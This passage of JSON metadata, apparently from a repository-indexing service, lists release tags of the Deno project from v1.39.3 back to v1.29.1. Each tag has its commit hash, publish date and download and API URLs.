ind":"commit","published_at":"2024-01-12T14:58:36.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.3/manifests"},{"name":"v1.39.2","sha":"6af25c0592af46781b63bd43cf12d39b8aa61d09","kind":"commit","published_at":"2024-01-04T20:40:03.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.2/manifests"},{"name":"v1.39.1","sha":"68254ddc2060c32e6daa55aa3b33f82739655705","kind":"commit","published_at":"2023-12-21T15:46:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.1/manifests"},{"name":"v1.39.0","sha":"5b96f7bf21392620f0047687ec3b75b25b7ea9f2","kind":"commit","published_at":"2023-12-13T21:52:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.39.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.39.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.39.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.39.0/manifests"},{"name":"v1.38.5","sha":"172e5f0a0cea97ba27f7f6e46fb8f9b31f8dbbc6","kind":"commit","published_at":"2023-12-05T22:37:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.5/manifests"},{"name":"v1.38.4","sha":"8c07f52a7cbd6117e968383c94fe25b91c4c9242","kind":"commit","published_at":"2023-11-30T19:12:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.4/manifests"},{"name":"v1.38.3","sha":"3193e93912f87dd05871abb61f54297368f3f265","kind":"commit","published_at":"2023-11-24T03:49:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.3/manifests"},{"name":"v1.38.2","sha":"118be11e8c64fd6c4afb352b5095c02fa5571e8e","kind":"commit","published_at":"2023-11-17T05:57:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.2/manifests"},{"name":"v1.38.1","sha":"0e7ad0388be7413db6ded8b60d5ae5d7cc0ffda0","kind":"commit","published_at":"2023-11-10T11:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.1/manifests"},{"name":"v1.38.0","sha":"41877a0b3735d52db8b4f5047b1d4d61e37ba585","kind":"commit","published_at":"2023-11-02T01:01:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.38.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.38.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.38.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.38.0/manifests"},{"name":"v1.37.2","sha":"7282994df4f9c1748affa7c4455eea46a9e1a2e0","kind":"commit","published_at":"2023-10-13T00:14:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.2/manifests"},{"name":"v1.37.1","sha":"72c276d61a8b43abd3dbcf4f1440a2bf133fe0d2","kind":"commit","published_at":"2023-09-27T06:24:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.1/manifests"},{"name":"v1.37.0","sha":"997aa604dfd50c0f0ec6fd4db16b5034d2cfd726","kind":"commit","published_at":"2023-09-19T20:29:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.37.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.37.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.37.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.37.0/manifests"},{"name":"v1.36.4","sha":"c0617d11f6391f1b1b3afffe0152c73b5989ab80","kind":"commit","published_at":"2023-09-01T14:15:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.4/manifests"},{"name":"v1.36.3","sha":"55029c72618323014aa49317de9124375adeb13f","kind":"commit","published_at":"2023-08-24T16:01:52.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.3/manifests"},{"name":"v1.36.2","sha":"a7f5244a72cc6c00949c02a180d0d9cdf2bf1672","kind":"commit","published_at":"2023-08-21T13:39:22.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.2/manifests"},{"name":"v1.36.1","sha":"9f1455b75087e9e41a995bbb6a8a7f3059a0185a","kind":"commit","published_at":"2023-08-10T10:53:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.1/manifests"},{"name":"v1.36.0","sha":"6ba245fe2570b29e35a4fd296a196a58870b1e3c","kind":"commit","published_at":"2023-08-03T16:26:25.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.36.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.36.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.36.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.36.0/manifests"},{"name":"v1.35.3","sha":"2e7254f2a60239603a2c6fea75cc71fbf6226470","kind":"commit","published_at":"2023-07-26T14:46:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.3/manifests"},{"name":"v1.35.2","sha":"60fe8aa5325345fc07c997b2dba169e45b87a863","kind":"commit","published_at":"2023-07-20T01:29:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.2/manifests"},{"name":"v1.35.1","sha":"b4824bf45f3d12e1b53e7eb5afcd49c38a575210","kind":"commit","published_at":"2023-07-12T21:49:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.1/manifests"},{"name":"v1.35.0","sha":"1ac5fddf54a828f1372e1ff10559d1a4bc70e5c9","kind":"commit","published_at":"2023-07-04T23:58:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.35.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.35.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.35.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.35.0/manifests"},{"name":"v1.34.3","sha":"ef24d1a0b7fb7f3297cbda1d80df6e1f72bef252","kind":"commit","published_at":"2023-06-15T22:16:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.3/manifests"},{"name":"v1.34.2","sha":"acf5d44a221b84e92bd0f6b1be5e6b08fcfb5a32","kind":"commit","published_at":"2023-06-09T00:13:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.2/manifests"},{"name":"v1.34.1","sha":"ea6cd3f1fccd5a621582788a4949d40d5fcdcd1b","kind":"commit","published_at":"2023-05-29T23:30:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.1/manifests"},{"name":"v1.34.0","sha":"935071dd0e233a55c93ca4792f9210f0ea6bccc6","kind":"commit","published_at":"2023-05-24T23:38:01.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.34.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.34.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.34.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.34.0/manifests"},{"name":"v1.33.4","sha":"5be97b7584c712848336da90077db86fe4859d96","kind":"commit","published_at":"2023-05-18T16:21:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.4/manifests"},{"name":"v1.33.3","sha":"12ba2d311bb6cce7c1bf2567748987e91585d540","kind":"commit","published_at":"2023-05-12T11:06:53.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.3/manifests"},{"name":"v1.33.2","sha":"c2a61a4192609615beba363f5606e6e04ae60c97","kind":"commit","published_at":"2023-05-04T14:39:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.2/manifests"},{"name":"v1.33.1","sha":"d5f52ef7ac20cb116fad574e3017f194124be312","kind":"commit","published_at":"2023-04-28T17:05:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.1/manifests"},{"name":"v1.33.0","sha":"39ece1fe0ddacc2cbf182403c9e7085bc01df5a6","kind":"commit","published_at":"2023-04-27T23:18:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.33.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.33.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.33.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.33.0/manifests"},{"name":"v1.32.5","sha":"6cfca9b33eb0647fc73ddfc20349ae9fb943d01a","kind":"commit","published_at":"2023-04-18T18:31:30.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.5","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.5/manifests"},{"name":"v1.32.4","sha":"709cfd6d91d335c16337be9339d45250e02ae247","kind":"commit","published_at":"2023-04-12T15:17:55.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.4/manifests"},{"name":"v1.32.3","sha":"73d472149ce6dd360a71ca5d1819d3f8f27754f8","kind":"commit","published_at":"2023-04-01T22:51:46.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.3/manifests"},{"name":"v1.32.2","sha":"24e0b31096682f0ec576e0021c1925611ec4e090","kind":"commit","published_at":"2023-03-31T20:41:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.2/manifests"},{"name":"v1.32.1","sha":"99b5eaa2f4f81b0f6fb46a388808a0d8f40b91e1","kind":"commit","published_at":"2023-03-23T20:00:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.1/manifests"},{"name":"v1.32.0","sha":"d06fdf6add1b3c55fc5f4a24956f17a363d513a4","kind":"commit","published_at":"2023-03-22T23:03:38.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.32.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.32.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.32.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.32.0/manifests"},{"name":"v1.31.3","sha":"f64adbe1a3b924b9436afa39b4302c5718bbb759","kind":"commit","published_at":"2023-03-16T05:41:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.3/manifests"},{"name":"v1.31.2","sha":"fc6edac5978e7a5e44fdcee05085c7492f0ccba9","kind":"commit","published_at":"2023-03-10T06:41:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.2/manifests"},{"name":"v1.31.1","sha":"86785f21194460d713276dca212302fa1bb1c943","kind":"commit","published_at":"2023-02-25T02:17:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.1/manifests"},{"name":"v1.31.0","sha":"b6ac54815c1bcfa44a45b3f2c1c982829482477f","kind":"commit","published_at":"2023-02-24T00:20:54.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.31.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.31.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.31.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.31.0/manifests"},{"name":"v1.30.3","sha":"f3fb8ee18826e66d3896ea864d2bedaed6c79308","kind":"commit","published_at":"2023-02-07T01:20:18.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.3/manifests"},{"name":"v1.30.2","sha":"cee13304ffe58286fcfab3526c46f95a7e23825d","kind":"commit","published_at":"2023-02-03T14:46:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.2/manifests"},{"name":"v1.30.1","sha":"000fb83c587a17118d83b990f1d08c98bb9cce2a","kind":"commit","published_at":"2023-02-02T14:26:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.1","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.1/manifests"},{"name":"v1.30.0","sha":"a6f915c22f34921780b4bcb8b6da8cd3bd20d5a8","kind":"commit","published_at":"2023-01-25T23:15:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.30.0","html_url":"https://github.com/denoland/deno/releases/tag/v1.30.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.30.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.30.0/manifests"},{"name":"v1.29.4","sha":"65db94feba9d4d51a09b74629f566dbc90484fba","kind":"commit","published_at":"2023-01-16T22:07:42.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.4","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.4/manifests"},{"name":"v1.29.3","sha":"9806dcc91496ab12c7fba238d411e23c22e2a302","kind":"commit","published_at":"2023-01-13T17:17:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.3","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.3/manifests"},{"name":"v1.29.2","sha":"14c4c8f9340235bd1ddb5388558c984beb0bb6d9","kind":"commit","published_at":"2023-01-05T13:37:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v1.29.2","html_url":"https://github.com/denoland/deno/releases/tag/v1.29.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v1.29.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v1.29.2/manifests"},{"name":"v1.29.1","sha":"145013ab7fb00c7293ce33806f26dc4083a8da66","kind":"commit","published_at":"2022-12-15T16:32:14.000Z","download_url":"